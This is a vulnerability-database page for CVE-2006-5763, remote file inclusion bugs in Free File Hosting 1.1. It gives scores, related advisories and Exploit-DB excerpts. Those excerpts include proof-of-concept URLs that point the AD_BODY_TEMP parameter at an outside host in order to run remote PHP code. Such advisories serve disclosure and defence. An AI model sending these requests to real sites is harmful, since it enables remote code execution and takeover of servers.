CVE-2006-5763
published 2006-11-06CVE-2006-5763: Multiple PHP remote file inclusion vulnerabilities in Free File Hosting 1.1, and possibly earlier, when register_globals is enabled, allow remote attackers to…
PriorityP333medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
4.91%
91.0th percentile
Multiple PHP remote file inclusion vulnerabilities in Free File Hosting 1.1, and possibly earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the AD_BODY_TEMP parameter to (1) login.php, (2) register.php, or (3) send.php. NOTE: the original provenance of this information is unknown; the details are obtained solely from third party information. NOTE: this issue was later reported for the "File Upload System" which is a component of Free File Hosting. Vector 1 also affects Free Image Hosting 2.0, which contains the same code.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| free_php_scripts | free_file_hosting | <= 1.1 | — |
| free_php_scripts | free_image_hosting | — | — |
| free_php_scripts | free_image_hosting | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-433j-4xq7-69pg: PHP remote file inclusion vulnerability in frontpage
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-1715 [HIGH] GHSA-433j-4xq7-69pg: PHP remote file inclusion vulnerability in frontpage
PHP remote file inclusion vulnerability in frontpage.php in Free Image Hosting 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the AD_BODY_TEMP parameter. NOTE: the forgot_pass.php vector is already covered by CVE-2006-5670, and the login.php vector overlaps CVE-2006-5763.
GHSA
GHSA-8r36-rp8c-gg5f: Multiple PHP remote file inclusion vulnerabilities in Free File Hosting 1
ghsa_unreviewed·2022-05-01
CVE-2006-5763 [MEDIUM] GHSA-8r36-rp8c-gg5f: Multiple PHP remote file inclusion vulnerabilities in Free File Hosting 1
Multiple PHP remote file inclusion vulnerabilities in Free File Hosting 1.1, and possibly earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the AD_BODY_TEMP parameter to (1) login.php, (2) register.php, or (3) send.php. NOTE: the original provenance of this information is unknown; the details are obtained solely from third party information. NOTE: this issue was later reported for the "File Upload System" which is a component of Free File Hosting. Vector 1 also affects Free Image Hosting 2.0, which contains the same code.
No detection rules found.
Exploit-DB
Free File Hosting System 1.1 - 'login.php?AD_BODY_TEMP' Remote File Inclusion
exploitdb·2007-03-24
CVE-2006-5763 Free File Hosting System 1.1 - 'login.php?AD_BODY_TEMP' Remote File Inclusion
Free File Hosting System 1.1 - 'login.php?AD_BODY_TEMP' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/23118/info
Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 1.1 is vulnerable to these issues.
This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability.
http://www.example.com/login.php?AD_BODY_TEMP=http://www.example2.com
Exploit-DB
Free File Hosting System 1.1 - 'register.php?AD_BODY_TEMP' Remote File Inclusion
exploitdb·2007-03-24
CVE-2006-5763 Free File Hosting System 1.1 - 'register.php?AD_BODY_TEMP' Remote File Inclusion
Free File Hosting System 1.1 - 'register.php?AD_BODY_TEMP' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/23118/info
Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 1.1 is vulnerable to these issues.
This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability.
http://www.example.com/register.php?AD_BODY_TEMP=http://www.example2.co
No writeups or analysis indexed.
http://secunia.com/advisories/22594http://www.attrition.org/pipermail/vim/2007-March/001473.htmlhttp://www.osvdb.org/30144http://www.osvdb.org/30145http://www.osvdb.org/30146http://www.securityfocus.com/archive/1/463707/100/0/threadedhttp://www.securityfocus.com/bid/23118https://exchange.xforce.ibmcloud.com/vulnerabilities/29874https://exchange.xforce.ibmcloud.com/vulnerabilities/33196https://www.exploit-db.com/exploits/3568http://secunia.com/advisories/22594http://www.attrition.org/pipermail/vim/2007-March/001473.htmlhttp://www.osvdb.org/30144http://www.osvdb.org/30145http://www.osvdb.org/30146http://www.securityfocus.com/archive/1/463707/100/0/threadedhttp://www.securityfocus.com/bid/23118https://exchange.xforce.ibmcloud.com/vulnerabilities/29874https://exchange.xforce.ibmcloud.com/vulnerabilities/33196https://www.exploit-db.com/exploits/3568
2006-11-06
Published